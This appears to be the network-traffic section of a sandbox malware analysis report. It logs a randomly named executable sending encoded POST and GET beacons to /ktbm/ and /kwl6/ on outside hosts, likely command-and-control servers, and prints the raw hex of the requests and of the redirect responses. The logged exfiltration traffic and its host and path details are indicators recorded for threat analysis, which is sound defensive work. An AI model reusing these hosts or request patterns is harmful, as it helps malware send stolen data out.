                          Data Ascii: uccess_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=62.999964X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopen


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.94971184.32.84.10180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:19.614945889 CEST811OUTPOST /ktbm/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.kosherphonestore.com
                          Origin: http://www.kosherphonestore.com
                          Referer: http://www.kosherphonestore.com/ktbm/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4e 4a 31 52 54 5a 6b 55 35 50 41 6a 64 79 38 32 34 57 6f 47 33 62 45 57 44 73 35 56
                          Data Ascii: mZytyNB=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+NJ1RTZkU5PAjdy824WoG3bEWDs5V
                          Jul 18, 2024 08:16:20.078794003 CEST1218INHTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:20 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: 5af15a31da118c6f021ed8dfc2e57d84-bos-edge3
                          x-hcdn-cache-status: DYNAMIC
                          x-hcdn-upstream-rt: 0.003
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.94971284.32.84.10180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:22.150762081 CEST835OUTPOST /ktbm/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.kosherphonestore.com
                          Origin: http://www.kosherphonestore.com
                          Referer: http://www.kosherphonestore.com/ktbm/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 71 48 46 6e 69 4b 59 4d 65 50 72 6b 76 56 7a 64 55 75 59 69 75 34 63 53 36 35 6c 77 62 77 6b 45 31 6b 2f 51 36 32 6d 34 33 44 61 76 53 32 6e 33 76 44 76 76 6c 4f 4b 78 62 37 64 6c 79 6e 77 32 71 36 6d 4d 43 2b 49 50 4e 32 63 4c 38 2f 4d 37 2f 77 74 77 61 6d 2f 67 52 75 5a 52 55 6a 31 35 58 2b 56 4f 45 67 54 48 49 52 46 33 4f 68 77 31 73 4c 69 4f 76 79 4f 78 39 6a 5a 5a 53 45 69 35 50 38 77 48 45 41 4c 54 68 6c 73 77 50 42 47 45 74 53 42 42 37 64 57 5a 62 35 77 6f 70 41 43 54 7a 63 6f 70 6b 68 64 69 4d 45 78 45 4c 77 39 39 4b 38 6e 2b 4c 6a 65 30 78 37 57 6c 6c 4b 51 66 75 5a 54 67 77 3d 3d
                          Data Ascii: mZytyNB=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwbwkE1k/Q62m43DavS2n3vDvvlOKxb7dlynw2q6mMC+IPN2cL8/M7/wtwam/gRuZRUj15X+VOEgTHIRF3Ohw1sLiOvyOx9jZZSEi5P8wHEALThlswPBGEtSBB7dWZb5wopACTzcopkhdiMExELw99K8n+Lje0x7WllKQfuZTgw==
                          Jul 18, 2024 08:16:22.640935898 CEST1218INHTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:22 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: 445d949564f4f5a99b4dd311110ccf0e-bos-edge1
                          x-hcdn-cache-status: DYNAMIC
                          x-hcdn-upstream-rt: 0.001
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.94971384.32.84.10180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:24.709618092 CEST1848OUTPOST /ktbm/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.kosherphonestore.com
                          Origin: http://www.kosherphonestore.com
                          Referer: http://www.kosherphonestore.com/ktbm/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 71 48 46 6e 69 4b 59 4d 65 50 72 6b 76 56 7a 64 55 75 59 69 75 34 63 53 36 35 6c 77 62 34 6b 48 47 63 2f 52 64 61 6d 35 33 44 61 78 43 33 67 33 76 44 49 76 6c 47 4f 78 61 47 2f 6c 78 66 77 33 4c 61 6d 62 48 53 49 57 39 32 63 44 63 2f 42 31 66 77 43 77 61 32 37 67 52 2b 5a 52 55 6a 31 35 56 32 56 49 56 67 54 49 6f 52 47 68 65 68 38 6b 38 4c 4b 4f 76 4c 78 78 39 6d 37 59 6d 77 69 35 72 59 77 49 53 73 4c 61 68 6c 75 38 76 42 6f 45 74 65 67 42 36 78 6b 5a 61 38 6c 6f 75 30 43 51 33 39 68 32 51 56 67 2b 2f 67 39 48 73 4d 71 33 38 38 66 77 34 32 35 74 42 79 79 37 58 76 6d 63 4f 4d 74 30 5a 57 56 66 38 51 58 4b 6c 43 59 72 4c 4a 59 32 57 55 33 52 57 59 52 59 50 51 70 67 51 53 34 6d 4e 52 39 67 78 6b 56 72 4c 39 4b 4e 74 4c 49 74 73 4c 56 45 65 36 66 34 6b 7a 43 4d 6e 4a 61 53 43 37 79 4b 72 39 4f 71 47 61 43 54 42 69 48 50 65 6d 37 41 34 6e 55 4e 61 42 7a 63 46 58 44 6c 6b 33 65 62 4b 61 68 55 73 5a 6c 70 7a 33 50 4c 43 44 66 69 77 66 37 69 54 [TRUNCATED]
                          Data Ascii: mZytyNB=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwb4kHGc/Rdam53DaxC3g3vDIvlGOxaG/lxfw3LambHSIW92cDc/B1fwCwa27gR+ZRUj15V2VIVgTIoRGheh8k8LKOvLxx9m7Ymwi5rYwISsLahlu8vBoEtegB6xkZa8lou0CQ39h2QVg+/g9HsMq388fw425tByy7XvmcOMt0ZWVf8QXKlCYrLJY2WU3RWYRYPQpgQS4mNR9gxkVrL9KNtLItsLVEe6f4kzCMnJaSC7yKr9OqGaCTBiHPem7A4nUNaBzcFXDlk3ebKahUsZlpz3PLCDfiwf7iTpogsmfWfa60vOSftLtiA31KAMUbmrtPQFaz5L+FDd0SVsE43i6ufIDay2l09HwX50iwuYF/Vh9m6vwkpv3CVt2LtyAsWbOaGin3xx/GJY1CIv0v3f5RFJ/X1OB+4DY40X5GRgi6Sqfk6AwTKpcVmmEU+xR6W4FrD3At4SUXMZDGXX5a1vOH8OXJs8EAV9slnFZVekHvm07dJ6lOOrnBge+GvZMOed6ROiTONaJfNAuB1F+Etjp+ym5TG4xDo22Vsx+YtScwG6taEaX/EmKT6PCvx9W4FWByZUejILcliDdG8lZK9ti947bqzGNrgxPtGd4AiDLaFKdiiZ1dJCuZGwSSv1mkNGIoHZYFYhOuJLhyUAih/QEiF7mK0S1TRAQ4wnx0CUtLatmz0y1Clcxx/6+Den4IpTG5ufacMF9gaiAbDUwU9P1CRtycqiob781G6OF+AW0q00osdyRMGE4oT6d0m0zzH9QdGWAt9/l+8oZLzrgEVyqix7kUm+WEIkYjtF0vjP6MNbwU6OnE1L0b2Bdnp6+rQ+OK7Quu3i/AOoswr5VQjJbD6rTbQjVDguGNeFGX4ZNZ9WNejuAGKSMbD00qFRmAUTIR/4hbnIjlWfPjdDow2UVuLSOsOrGEQ+hh7QM76Y9cHTEI3vbSonPMP9/SbugXLKVdzKP [TRUNCATED]
                          Jul 18, 2024 08:16:25.186525106 CEST1218INHTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:25 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: c66a616342a343fd6e933158360fe357-bos-edge2
                          x-hcdn-cache-status: DYNAMIC
                          x-hcdn-upstream-rt: 0.000
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.94971484.32.84.10180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:27.240205050 CEST534OUTGET /ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.kosherphonestore.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:16:27.703633070 CEST1236INHTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:27 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH0
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: e5ef10c779073db1f009a50ae865ef16-bos-edge2
                          x-hcdn-cache-status: MISS
                          x-hcdn-upstream-rt: 0.001
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px
                          Jul 18, 2024 08:16:27.704530001 CEST119INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d
                          Data Ascii: ;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.94971543.155.26.24180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:33.167057991 CEST790OUTPOST /kwl6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.cwgehkk.store
                          Origin: http://www.cwgehkk.store
                          Referer: http://www.cwgehkk.store/kwl6/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 33 4f 38 77 56 75 6a 76 47 52 4a 37 34 77 31 66 59 6d 72 70 66 43 78 4a 73 47 53 46 42 38 4c 56 66 72 61 55 4a 45 57 76 50 72 38 6d 38 67 42 61 43 63 44 56 4f 54 64 62 78 38 66 73 42 72 54 6b 69 2f 4f 52 39 68 48 44 63 4d 73 6d 64 4e 63 4c 41 4e 4f 42 65 6b 73 64 51 4f 51 58 6b 64 58 57 55 41 56 4f 7a 78 6e 45 2f 4d 51 79 43 59 4f 72 43 34 43 79 65 78 4d 58 64 64 67 75 6a 36 52 4c 48 72 66 55 6d 4c 48 72 61 66 56 2b 65 2b 4b 66 68 55 2b 52 79 76 6d 34 42 42 4d 65 59 55 61 62 48 47 59 62 66 4b 59 77 43 72 69 42 32 2f 78 34
                          Data Ascii: mZytyNB=X4cns1+Ys7G53O8wVujvGRJ74w1fYmrpfCxJsGSFB8LVfraUJEWvPr8m8gBaCcDVOTdbx8fsBrTki/OR9hHDcMsmdNcLANOBeksdQOQXkdXWUAVOzxnE/MQyCYOrC4CyexMXddguj6RLHrfUmLHrafV+e+KfhU+Ryvm4BBMeYUabHGYbfKYwCriB2/x4


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.94971643.155.26.24180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:35.708257914 CEST814OUTPOST /kwl6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.cwgehkk.store
                          Origin: http://www.cwgehkk.store
                          Referer: http://www.cwgehkk.store/kwl6/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 76 56 63 4c 71 55 49 42 69 76 4f 72 38 6d 79 41 42 66 47 63 43 62 4f 54 51 37 78 39 7a 73 42 72 33 6b 69 2b 2b 52 38 57 72 41 64 63 73 34 53 74 63 4a 4f 74 4f 42 65 6b 73 64 51 4f 30 74 6b 64 50 57 55 56 64 4f 77 51 6e 44 68 63 52 41 42 59 4f 72 54 6f 43 32 65 78 4d 68 64 63 38 41 6a 2f 56 4c 48 75 37 55 6e 66 54 6f 56 66 56 30 52 65 4c 53 74 6c 50 47 35 73 6d 65 50 79 51 42 47 46 2b 61 4a 48 34 46 4f 34 52 72 58 38 69 6d 78 59 34 51 51 52 75 6c 36 76 57 34 4d 79 6f 65 4d 54 32 4a 72 31 46 4b 53 67 3d 3d
                          Data Ascii: mZytyNB=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOvVcLqUIBivOr8myABfGcCbOTQ7x9zsBr3ki++R8WrAdcs4StcJOtOBeksdQO0tkdPWUVdOwQnDhcRABYOrToC2exMhdc8Aj/VLHu7UnfToVfV0ReLStlPG5smePyQBGF+aJH4FO4RrX8imxY4QQRul6vW4MyoeMT2Jr1FKSg==


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.94971743.155.26.24180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:38.240376949 CEST1827OUTPOST /kwl6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.cwgehkk.store
                          Origin: http://www.cwgehkk.store
                          Referer: http://www.cwgehkk.store/kwl6/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 6e 56 63 36 4b 55 49 6d 4f 76 63 37 38 6d 36 67 42 65 47 63 43 57 4f 54 59 6b 78 39 76 57 42 74 7a 6b 6a 59 43 52 74 58 72 41 58 63 73 34 4b 64 63 49 41 4e 50 62 65 6b 38 5a 51 4f 6b 74 6b 64 50 57 55 53 74 4f 6b 78 6e 44 6a 63 51 79 43 59 4f 5a 43 34 43 4b 65 78 55 66 64 64 49 2b 6a 72 68 4c 48 4f 72 55 68 70 76 6f 4b 76 56 79 51 65 4b 42 74 6c 43 42 35 73 37 6c 50 78 4d 2f 47 43 4b 61 4c 44 46 73 55 62 64 39 4e 74 79 42 36 37 41 6f 59 57 76 46 32 76 37 43 4f 6a 4d 45 51 7a 72 6f 76 47 35 46 4e 4c 6c 47 34 6d 4a 52 47 2b 65 36 37 6e 46 32 47 6e 6a 77 66 4e 43 73 61 68 32 50 62 66 59 75 4e 4c 55 70 34 6b 2b 47 75 61 46 59 71 4b 2b 57 32 57 37 32 62 74 50 38 6b 72 69 70 2b 74 33 56 37 75 61 45 56 56 56 45 69 